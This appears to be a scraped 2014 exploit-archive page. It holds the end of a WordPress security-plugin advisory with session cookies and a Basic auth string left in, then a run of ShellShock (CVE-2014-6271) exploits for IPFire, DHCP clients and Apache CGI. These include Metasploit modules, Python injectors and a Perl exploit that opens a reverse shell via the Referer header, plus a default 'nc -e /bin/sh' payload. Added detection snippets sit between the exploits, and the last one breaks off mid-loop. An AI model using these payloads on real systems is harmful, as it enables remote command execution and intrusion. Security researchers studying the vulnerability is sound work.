      Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
      Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
      Connection[keep-alive]
   Response Header:
      Server[nginx]
      Date[Fri, 26 Sep 2014 17:53:54 GMT]
      Content-Type[text/html; charset=UTF-8]
      Content-Length[6136]
      Connection[keep-alive]
      Expires[Wed, 11 Jan 1984 05:00:00 GMT]
      Cache-Control[no-cache, must-revalidate, max-age=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      X-Powered-By[PleskLin]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
 
 
 
 
Reference(s):
/wp-admin/admin-ajax.php
/wp-admin/admin.php?page=aiowpsec_filesystem
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
/wp-content/plugins/all-in-one-wp-security-and-firewall/
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
 
 
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the Enter System Log File Name input context in the file system security module.
The second issue can be patched by a secure encode and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module.
Restrict the input and handle malicious context with its own secure exception handling to prevent further POST injection attacks.
 
 
Security Risk:
==============
The security risk of the POST inject web vulnerabilities in the firewall module is estimated as medium.
 
 
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
 
 
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
 
Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    dev.vulnerability-db.com     - forum.vulnerability-db.com                - magazine.vulnerability-db.com
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/
 
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
 
        Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
 
 
-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


30Sep/14

IPFire 2.15 Bash Command Injection

#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
#       It can be maintained via a web interface.
#       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
#       IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
#
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
#                (CVE-2014-6271)
#
# Suggestion:
#
# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
#
#
# http connection
import urllib2
# Basic Auth management Base64
import base64
# Args management
import optparse
# Error management
import sys
 
banner = """
       ___ _______ _______ __                _______       __
      |   |   _   |   _   |__.----.-----.   |   _   .-----|__|
      |.  |.  1   |.  1___|  |   _|  -__|   |.  1___|  _  |  |
      |.  |.  ____|.  __) |__|__| |_____|   |.  |___|___  |__|
      |:  |:  |   |:  |                     |:  1   |_____|
      |::.|::.|   |::.|                     |::.. . |
      `---`---'   `---'                     `-------'
   _______ __          __ __ _______ __               __
  |   _   |  |--.-----|  |  |   _   |  |--.-----.----|  |--.
  |   1___|     |  -__|  |  |   1___|     |  _  |  __|    <
  |____   |__|__|_____|__|__|____   |__|__|_____|____|__|__|
  |:  1   |                 |:  1   |
  |::.. . |                 |::.. . |
  `-------'                 `-------'
 
                                IPFire <= 2.15 c0re 82 Authenticated
                                Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
 
                          Written by:
 
                        Claudio Viviani
 
                     http://www.homelab.it
 
                        info@homelab.it
                    homelabit@protonmail.ch
 
               https://www.facebook.com/homelabit
                  https://twitter.com/homelabit
               https://plus.google.com/+HomelabIt1/
     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url
 
def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] IPFire Basic Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
                headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
                response = urllib2.Request(url, None, headers)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                if "ipfire" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    if 'H0m3l4b1t' in  content:
                        print '[!] Command "'+cmd+'": INJECTED!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                     print '[X] No IPFire page found'
            except urllib2.HTTPError, e:
                if e.code == 401:
                   print '[X] Wrong username or password'
                else:
                   print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        print '[X] Connection Error'
 
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-u', '--user', action="store",
                  help="Insert username",
                  )
commandList.add_option('-p', '--pwd', action="store",
                  help="Insert password",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
 
connectionScan(url,user,pwd,cmd)


29Sep/14

DHCP Client Bash Environment Variable Code Injection

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/proto/dhcp'
 
class Metasploit3 < Msf::Auxiliary
 
  include Msf::Exploit::Remote::DHCPServer
 
  def initialize
    super(
      'Name'        => 'DHCP Client Bash Environment Variable Code Injection',
      'Description'    => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting dhclient network configuration
        scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
      },
      'Author'      =>
        [
          'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module
          'Stephane Chazelas', # Vulnerability discovery
          'Ramon de C Valle' # This module
        ],
      'License' => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'Service' ]
        ],
      'PassiveActions' =>
        [
          'Service'
        ],
      'DefaultAction'  => 'Service',
      'References' => [
        ['CVE', '2014-6271'],
        ['CWE', '94'],
        ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649',],
        ['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',]
      ],
      'DisclosureDate' => 'Sep 24 2014'
    )
 
    register_options(
      [
        OptString.new('SRVHOST',     [ true, 'The IP of the DHCP server' ]),
        OptString.new('NETMASK',     [ true, 'The netmask of the local subnet' ]),
        OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
        OptString.new('DHCPIPEND',   [ false, 'The last IP to give out' ]),
        OptString.new('ROUTER',      [ false, 'The router IP address' ]),
        OptString.new('BROADCAST',   [ false, 'The broadcast address to send to' ]),
        OptString.new('DNSSERVER',   [ false, 'The DNS server IP address' ]),
        # OptString.new('HOSTNAME',    [ false, 'The optional hostname to assign' ]),
        OptString.new('HOSTSTART',   [ false, 'The optional host integer counter' ]),
        OptString.new('FILENAME',    [ false, 'The optional filename of a tftp boot server' ]),
        OptString.new('CMD',         [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
      ], self.class)
  end
 
  def run
    value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
 
    # This loop is required because the current DHCP Server exits after the
    # first interaction.
    loop do
      begin
        start_service({
          'HOSTNAME' => value,
          'DOMAINNAME' => value,
          'URL' => value
        }.merge(datastore))
 
        while dhcp.thread.alive?
          select(nil, nil, nil, 2)
        end
 
      rescue Interrupt
        break
 
      ensure
        stop_service
      end
    end
  end
 
end
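The module above puts one value into the HOSTNAME, DOMAINNAME and URL DHCP options and lets dhclient's network-configuration scripts export them into bash's environment. The block below is an added example, not part of the Metasploit module or of Rex::Proto::DHCP: it builds the same value the module does, encodes it as DHCP option TLVs, and decodes the options field back to flag any value beginning with the "() {" prefix that unpatched bash treats as an exported function. Assumptions: the option codes 12 (Host Name), 15 (Domain Name) and 114 (URL) are the standard codes for those options; how Rex maps the module's option keys onto the wire is not shown on this page. Only the options field is built, not a full DHCP offer, and values longer than 255 bytes (which would need RFC 3396 splitting) are rejected rather than split.

```python
"""Added example (not the module's own code): ShellShock payload inside DHCP options."""
import struct

DHCP_MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_PAD, OPT_HOST_NAME, OPT_DOMAIN_NAME, OPT_URL, OPT_END = 0, 12, 15, 114, 255
DEFAULT_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def shellshock_value(cmd, path=DEFAULT_PATH):
    """Same shape as the module's `value`: an empty function body, then the real command.
    PATH is set explicitly because dhclient hook scripts may run with a minimal one."""
    return "() { :; }; PATH=%s %s" % (path, cmd)


def encode_options(options):
    """options: iterable of (code, bytes). Returns the options field: magic cookie,
    one TLV per option, then END. One TLV carries at most 255 bytes (one-byte length)."""
    out = bytearray(DHCP_MAGIC_COOKIE)
    for code, value in options:
        if not 0 < len(value) <= 255:
            raise ValueError("option %d: length %d out of range" % (code, len(value)))
        out += struct.pack("BB", code, len(value)) + value
    out.append(OPT_END)
    return bytes(out)


def decode_options(blob):
    """Walk the TLVs after the magic cookie; returns a list of (code, bytes).
    PAD (0) has no length byte, END (255) stops the walk, truncation raises."""
    if blob[:4] != DHCP_MAGIC_COOKIE:
        raise ValueError("missing DHCP magic cookie")
    i, opts = 4, []
    while i < len(blob):
        code = blob[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        if i + 1 >= len(blob):
            raise ValueError("truncated option header at offset %d" % i)
        length = blob[i + 1]
        value = blob[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option %d at offset %d" % (code, i))
        opts.append((code, value))
        i += 2 + length
    return opts


def find_shellshock_options(blob):
    """Return (code, text) for every option whose value unpatched bash would import
    as a function: the value must begin with exactly "() {"."""
    hits = []
    for code, value in decode_options(blob):
        if value.startswith(b"() {"):
            hits.append((code, value.decode("latin-1")))
    return hits


def build_malicious_offer_options(cmd):
    """Constructed sample: the options field a rogue server would send,
    mirroring the module's use of the same value for all three options."""
    value = shellshock_value(cmd).encode()
    return encode_options([
        (OPT_HOST_NAME, value),
        (OPT_DOMAIN_NAME, value),
        (OPT_URL, value),
    ])


if __name__ == "__main__":
    blob = build_malicious_offer_options("/bin/nc -e /bin/sh 127.0.0.1 4444")
    for code, text in find_shellshock_options(blob):
        print("option %3d: %s" % (code, text))
```

The decoder is what a DHCP relay, a packet capture parser or a host-side agent would run to spot rogue offers carrying the payload; the exact "() {" prefix is the trigger bash checked before the fix, so matching on it has no false positives against normal hostnames or domain names.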


29Sep/14

Apache mod_cgi Bash Environment Variable Code Injection

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'wvu', # Original Metasploit aux module
        'juan vazquez' # Allow wvu's module to get native sessions
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))
 
    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end
 
  def check
    res = req("echo #{marker}")
 
    if res && res.body.include?(marker * 3)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
 
  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end
 
    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
 
    # A last chance after the cmdstager
    # Trying to make it generic
    unless session_created?
      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
    end
  end
 
  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
 
    req(cmd)
  end
 
  def req(cmd)
    send_request_cgi(
      {
        'method' => datastore['METHOD'],
        'uri' => normalize_uri(target_uri.path.to_s),
        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
      }, datastore['TIMEOUT'])
  end
 
  def marker
    @marker ||= rand_text_alphanumeric(rand(42) + 1)
  end
end


29Sep/14

Gnu Bash 4.3 CGI Scan Remote Command Injection

#!/usr/bin/env python
 
# http connection
import urllib2
# Args management
import optparse
# Error management
import sys
 
banner = """
      _______                 _______             __
     |   _   .-----.--.--.   |   _   .---.-.-----|  |--.
     |.  |___|     |  |  |   |.  1   |  _  |__ --|     |
     |.  |   |__|__|_____|   |.  _   |___._|_____|__|__|
     |:  1   |               |:  1    \
     |::.. . |               |::.. .  /
     `-------'               `-------'
      ___ ___   _______     _______ _______ ___
     |   Y   | |   _   |   |   _   |   _   |   |
     |   |   |_|___|   |   |.  l   |.  1___|.  |
     |____   |___(__   |   |.  _   |.  |___|.  |
         |:  | |:  1   |   |:  |   |:  1   |:  |
         |::.| |::.. . |   |::.|:. |::.. . |::.|
         `---' `-------'   `--- ---`-------`---'
 
                              Gnu B4sh <= 4.3 Cg1 Sc4n + r3m0t3 C0mm4nd Inj3ct10n
 
          ==========================================
          - Release date: 2014-09-25
          - Discovered by: Stephane Chazelas
          - CVE: 2014-6271
          ===========================================
 
                        Written by:
 
                      Claudio Viviani
 
                   http://www.homelab.it
 
                      info@homelab.it
                  homelabit@protonmail.ch
 
             https://www.facebook.com/homelabit
                https://twitter.com/homelabit
             https://plus.google.com/+HomelabIt1/
   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url
 
def connectionScan(url):
    print '[+] Checking for vulnerability...'
    try:
        headers = {"VULN" : "() { :;}; echo 'H0m3l4b1t: YES'"}
        response = urllib2.Request(url, None, headers)
        content = urllib2.urlopen(response)
        if 'H0m3l4b1t' in  content.info():
            print '[!] VULNERABLE: '+url
        else:
            print '[X] NOT Vulnerable'
    except urllib2.HTTPError, e:
        print e.info()
        if e.code == 404:
            print '[X] Page not found'
        else:
            print '[X] HTTP Error'
    except urllib2.URLError:
        print '[X] Connection Error'
 
def connectionInje(url,cmd):
    try:
        headers = { 'User-Agent' : '() { :;}; /bin/bash -c "'+cmd+'"' }
        response = urllib2.Request(url, None, headers)
        content = urllib2.urlopen(response).read()
        print '[!] '+cmd+' command sent!'
    except urllib2.HTTPError, e:
        if e.code == 500:
            print '[!] '+cmd+' command sent!!!'
        else:
            print '[!] command not sent :('
    except urllib2.URLError:
        print '[X] Connection Error'
 
commandList = optparse.OptionParser('usage: %prog [-s] -t http://localhost/cgi-bin/test -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
commandList.add_option('-s', '--scan', default=False, action="store_true",
                  help="Scan Only",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
elif options.target and not options.cmd and not options.scan:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
url = checkurl(options.target)
cmd = options.cmd
if options.scan:
    print '[+] Scan Only Mode'
    connectionScan(url)
else:
    print '[+] Remote Command Injection Mode'
    connectionScan(url)
    connectionInje(url,cmd)


29Sep/14

bashedCgi Remote Command Execution

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'bashedCgi',
      'Description'    => %q{
        Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
      },
      # Both authors in one array: a hash literal with two 'Author' keys keeps only the last one.
      'Author'         =>
        [
          'Stephane Chazelas', # vuln discovery
          'Shaun Colley <scolley at ioactive.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      # References is a list of [type, value] pairs, not a single pair.
      'References'     => [ [ 'CVE', '2014-6271' ] ],
      'Targets'        =>
        [
          [ 'cgi', {} ]
        ],
      'DefaultTarget'  => 0,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true
        },
      'DefaultOptions' => { 'PAYLOAD' => 0 }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
        OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
      ], self.class)
  end

  def run
    # The payload rides in the User-Agent header, which mod_cgi exports as HTTP_USER_AGENT.
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => datastore['TARGETURI'],
      'agent'    => "() { :;}; " + datastore['CMD']
    })

    if res && res.code == 200
      print_good("Command sent - 200 received")
    else
      print_error("Command sent - non-200 response")
    end
  end
end


26Sep/14

Gnu Bash 4.3 CGI REFERER Command Injection

#!/usr/bin/perl
#
# Title: Bash/cgi command execution exploit
# CVE: CVE-2014-6271
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 25 September 2014
# Published: 26 September 2014
# MorXploit Research
# http://www.MorXploit.com
#
# Description:
# Perl code to exploit CVE-2014-6271.  
# Injects a Perl connect back shell. 
#
# Download:
# http://www.morxploit.com/morxploits/morxbash.pl
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Tested on:
# Apache 2.4.7 / Ubuntu 14.04.1 LTS / Bash 4.3.11(1)-release (x86_64-pc-linux-gnu)
#
# Demo:
# perl morxbash.pl http://localhost cgi-bin/test.cgi 127.0.0.1 1111
#
# ===================================================
# --- Bash/cgi remote command execution exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] MorXploiting http://localhost/cgi-bin/test.cgi
# [+] Sent payload! Waiting for connect back shell ...
# [+] Et voila you are in!
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
 
use LWP::UserAgent;
use IO::Socket;
use strict;
 
sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Bash/cgi remote command execution exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}
 
if (@ARGV < 4) {
banner();
print "perl $0 <target> <cgi script path> <connectbackIP> <connectbackport>\n";
print "perl $0 http://localhost cgi-bin/test.cgi 127.0.0.1 31337\n";
exit;
}
 
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $cbhost = $ARGV[2];
my $cbport = $ARGV[3];
my $other = "http://localhost:81";
$| = 1;
$SIG{CHLD} = 'IGNORE';
 
my $l_sock = IO::Socket::INET->new(
Proto => "tcp",
LocalPort => "$cbport",
Listen => 1,
LocalAddr => "0.0.0.0",
Reuse => 1,
) or die "[-] Could not listen on $cbport: $!\n";
 
sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$dir");
unless ($status->is_success) {
banner();
print "[-] Error: " . $status->status_line . "\n";
exit;
}
 
banner();
print "[*] MorXploiting $host/$dir\n";
 
my $payload = "() { :; }; /bin/bash -c \"perl -e '\\\$p=fork;exit,if(\\\$p); use Socket; use FileHandle; my \\\$system = \\\"/bin/sh\\\"; my \\\$host = \\\"$cbhost\\\"; my \\\$port = \\\"$cbport\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\")); connect(SOCKET, sockaddr_in(\\\$port, inet_aton(\\\$host))); SOCKET->autoflush(); open(STDIN, \\\">&SOCKET\\\"); open(STDOUT,\\\">&SOCKET\\\"); open(STDERR,\\\">&SOCKET\\\"); print \\\"[+] Et voila you are in!\\\\n\\\\n\\\"; system(\\\"uname -a;id\\\"); system(\\\$system);'\"";
my $exploit = $ua->get("$host/$dir", Referer => "$payload");
print "[+] Sent payload! Waiting for connect back shell ...\n";
my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);
 
sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
my $written_len = syswrite($dst, $buf);
return unless $written_len;
$write_len -= $written_len;
}
}
}
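Two of the posts above are worth putting side by side: the Apache mod_cgi module decides "vulnerable" by sending `() { :;};echo M$(echo M)M` in the User-Agent and looking for the marker repeated three times in the body, and the Perl exploit just above carries the same kind of payload in the Referer header instead. The block below is an added example written for this page; it is not code from any of the posts or tools above. It mirrors the module's marker check in Python 3 and then runs the matching detection over an Apache combined-format access log, which records exactly the two headers these tools inject through (Referer and User-Agent; a custom header such as the scanner's "VULN" would not appear in the log). The log lines are constructed for the example, using documentation address ranges, not captured from a real host.

```python
"""Added example (not from the posts above): ShellShock probe check and access-log detection."""
import re

# Combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
# Apache escapes a literal quote inside a logged header as \" so the quoted fields
# allow backslash-escaped characters.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Unpatched bash imports a function from any environment variable whose value
# begins with exactly "() {", and also parses and runs whatever follows the
# closing brace. The detector is looser than bash on purpose (optional
# whitespace, optional ";") so that probes and evasion attempts still show up.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<tail>.*)$')


def build_probe(marker, cmd):
    """Same shape as the mod_cgi module's User-Agent: () { :;};echo M$(cmd)M"""
    return "() { :;};echo %s$(%s)%s" % (marker, cmd, marker)


def probe_succeeded(marker, body):
    """Mirror of `res.body.include?(marker * 3)`: check() sends cmd == "echo M",
    so a vulnerable target echoes the marker three times back to back."""
    return marker * 3 in body


def find_injection(header_value):
    """Return the injected command text, or None if the header value is benign."""
    m = SHELLSHOCK_RE.search(header_value)
    return m.group('tail').strip() if m else None


def scan_log(lines):
    """Flag requests whose Referer or User-Agent carries a ShellShock payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:  # not combined format, or a truncated line
            continue
        for field in ('referer', 'agent'):
            cmd = find_injection(m.group(field))
            if cmd is not None:
                hits.append({'host': m.group('host'), 'request': m.group('request'),
                             'field': field, 'command': cmd})
    return hits


# Constructed sample lines (documentation address ranges, not real traffic):
# a User-Agent probe like the scanner's, a Referer injection like the Perl
# exploit's, and one ordinary browser request.
SAMPLE_LOG = [
    '203.0.113.9 - - [29/Sep/2014:10:15:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 512 "-" "() { :;}; echo H0m3l4b1t"',
    '203.0.113.9 - - [29/Sep/2014:10:15:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 512 "() { :; }; /bin/bash -c \'id\'" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.4 - - [29/Sep/2014:10:16:00 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0"',
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
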